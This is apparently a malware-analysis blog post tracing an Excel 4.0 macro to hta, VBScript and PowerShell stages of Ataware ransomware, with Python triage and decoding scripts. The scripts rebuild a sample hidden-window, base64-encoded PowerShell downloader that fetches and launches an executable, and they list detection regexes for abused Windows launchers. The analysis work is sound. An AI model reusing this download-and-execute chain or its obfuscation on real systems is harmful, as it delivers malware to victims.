Excel 4.0 Macro, hta, VBScript & PowerShell Analysis Ataware Ransomware – Part 0x1

This will be a multi-part blog series analysing the complete infection chain from Excel to Ataware Ransomware. In this post we will discuss the analysis steps for the hta, VBScript & PowerShell code to extract the final payload URL. Let's start with the xls. I was browsing Twitter for an interesting sample when I found this tweet from @nao_sec and started investigating. You can download the xls from ANY.RUN.

[Figure: nao_sec Tweet]

Overview of analysis steps

[Figure: Ataware infection vector and overview of analysis steps]

xls analysis steps

  1. Check the file type and extract the strings:
    strings "563902-IT Services Procurement Catalog updated.xls" > str_excel.txt
    [Figure: file and strings run on the xls]
  2. Go through the strings output and you will find the mshta command with the Dropbox URL.
    [Figure: mshta string in the strings output]
  3. Using only the strings tool, you now know this Excel file is definitely malicious.
  4. Let's analyse it further to understand how this mshta command is invoked.
  5. Run olevba on the xls. As you can see in the output below, it uses a hidden Excel 4.0 macro sheet to execute the mshta command.
    [Figure: olevba output detecting the Excel 4.0 macro]
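Steps 1 and 2 can be reproduced offline in a few lines. The Python below is an added example, not the blog's own tooling: it pulls printable runs out of a byte blob the way `strings` does, then flags any string that pairs a trusted Windows launcher such as mshta with a URL, which is exactly the pattern spotted in the screenshot above. The byte blob, the `dropbox.invalid` host and the PLACEHOLDER path are constructed stand-ins, not the real sample.

```python
import re

# Constructed stand-in for the xls body: OLE header bytes, binary noise and
# one ASCII command string, the way `strings` would see it. Not the real file.
SAMPLE_XLS_BYTES = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16
    + b"Workbook\x00\x00\x01\x02"
    + b"mshta https://dropbox.invalid/s/PLACEHOLDER/htseelaaa.hta?dl=1\x00"
    + b"\x03\x04Sheet1\x00\x00\x05"
)

MIN_LEN = 4  # GNU strings' default minimum run length

# Trusted Windows utilities commonly abused as script or payload launchers
LOLBIN_RE = re.compile(
    r"\b(mshta|wscript|cscript|powershell|certutil|rundll32|regsvr32)\b", re.I
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)


def extract_strings(data, min_len=MIN_LEN):
    """Return every run of at least min_len printable ASCII bytes, like `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_indicators(strings):
    """Flag strings that contain a launcher name and/or a URL.

    Returns one dict per hit: the raw string, the launcher (lower-case, or
    None if only a URL was found) and the list of URLs inside the string.
    """
    hits = []
    for s in strings:
        lolbin = LOLBIN_RE.search(s)
        urls = URL_RE.findall(s)
        if lolbin or urls:
            hits.append({
                "string": s,
                "lolbin": lolbin.group(1).lower() if lolbin else None,
                "urls": urls,
            })
    return hits


def triage(data):
    """Step 1 and step 2 in one call: extract strings, then check indicators."""
    return find_indicators(extract_strings(data))


if __name__ == "__main__":
    for hit in triage(SAMPLE_XLS_BYTES):
        print("suspicious string:", hit["string"])
        print("  launcher:", hit["lolbin"], "| urls:", hit["urls"])
```

The regex-based extractor is the same idea as `strings -n 4`; on a real file, replace `SAMPLE_XLS_BYTES` with `open(path, "rb").read()` and review every hit rather than only the first one.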

For more details on Excel 4.0 macros, check the references section [1]. Now we will move on to the hta file analysis.

htseelaaa.hta analysis

[Figure: Content of the hta file]

Why are attackers using hta?

HTAs are standalone applications that execute using the same models and technologies as Internet Explorer, but outside of the browser [2]. An hta file can be executed using the built-in, trusted Windows utility mshta, which can bypass application whitelisting.

Deobfuscation steps
  1. Extract the VBScript code from the hta file and save it as a .vbs file.
  2. Replace eval with Wscript.Echo and execute the script using cscript.
    [Figure: Replace eval with Wscript.Echo and run using cscript]
  3. Now you can see the base64-encoded PowerShell code. Instead of deobfuscating it manually, let's run the PowerShell code inside our VM with FakeNet-NG.
    [Figure: Execute the PowerShell code extracted from the VBScript]
  4. Enable PowerShell enhanced logging before running the above PowerShell code; for more details, see Deobfuscate PowerShell using PowerShell Logging.
  5. After executing it, go through the PowerShell logs in Event Viewer to find the deobfuscated code, as shown below.
    [Figure: Decoded PowerShell in the PowerShell logs]
  6. Copy the PowerShell code after removing iex and execute it to see the final decoded code shown below.
    [Figure: Final decoded PowerShell]
  7. This PowerShell downloads the PE file from the Dropbox link and executes it from the $temp directory with the filename ATAPIinit.exe.
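The steps above unwrap the script dynamically, by letting PowerShell's own logging record each layer. As an added example, not code from the post, the Python below does the same unwrapping statically: it decodes the -EncodedCommand argument (base64 of UTF-16LE text), peels any nested FromBase64String literal that is handed to iex, and lists the URLs and executable names left in the final layer. The sample command line, its two-layer structure, the `dropbox.invalid` host and the PLACEHOLDER path are constructed stand-ins; the real sample's obfuscation differs, so the layer-peeling regex is a starting point to extend, not a universal decoder.

```python
import base64
import re

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
EXE_RE = re.compile(r"[\w\-.]+\.exe", re.I)
IEX_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob
ENC_ARG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
B64_LITERAL_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)


def _b64(text, encoding):
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# --- constructed sample (hypothetical layering, placeholder URL) -------------
# Innermost stage: mirrors what step 7 says the final code does.
INNER_PS = (
    "$u='https://dropbox.invalid/s/PLACEHOLDER/ATAPIinit.exe?dl=1';"
    "$p=\"$env:temp\\ATAPIinit.exe\";"
    "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p"
)
# Middle stage: the base64-plus-iex wrapper that step 6 strips by hand.
OUTER_PS = (
    "$c=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
    + _b64(INNER_PS, "ascii") + "'));iex $c"
)
# What the VBScript echoes once eval is swapped for Wscript.Echo (steps 2-3).
ECHOED_COMMAND = (
    "powershell.exe -nop -w hidden -EncodedCommand " + _b64(OUTER_PS, "utf-16le")
)
# -----------------------------------------------------------------------------


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand; PowerShell encodes it as UTF-16LE."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16le")


def peel_layers(script, max_depth=5):
    """Follow nested FromBase64String('...') literals; outermost layer first."""
    layers = [script]
    for _ in range(max_depth):
        m = B64_LITERAL_RE.search(layers[-1])
        if not m:
            break
        layers.append(base64.b64decode(m.group(1)).decode("ascii", errors="replace"))
    return layers


def extract_iocs(script):
    """URLs, .exe names and whether the layer still relies on iex."""
    return {
        "urls": URL_RE.findall(script),
        "files": sorted(set(EXE_RE.findall(script))),
        "uses_iex": bool(IEX_RE.search(script)),
    }


def analyse(cmdline):
    """Full static pass: decode the argument, peel layers, report the last one."""
    layers = peel_layers(decode_encoded_command(cmdline))
    return {"layers": layers, "iocs": extract_iocs(layers[-1])}


if __name__ == "__main__":
    result = analyse(ECHOED_COMMAND)
    for i, layer in enumerate(result["layers"]):
        print(f"--- layer {i} ---\n{layer}")
    print("IOCs in final layer:", result["iocs"])
```

A layer whose `uses_iex` is still True means the peeling stopped early (a string-building trick the regex does not recognise); that is the point at which the logging-based approach in steps 4 and 5 is the quicker route.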

Conclusion

  • The infection vector is unique as it combines the Excel 4.0 macro technique with mshta and PowerShell.
  • Heavily obfuscated to slow down analysis.
  • Uses Dropbox for initial payload delivery, as Dropbox may be allowed through the proxy.

In the upcoming part 0x2 we will analyse the UAC bypass using the CMSTPLUA COM interface technique used by the PE file downloaded by the PowerShell.

Thanks for reading. Feel free to connect with me on or LinkedIn for any suggestions or comments.

For more updates and exclusive content, subscribe to our newsletter. Happy Reversing! 😊
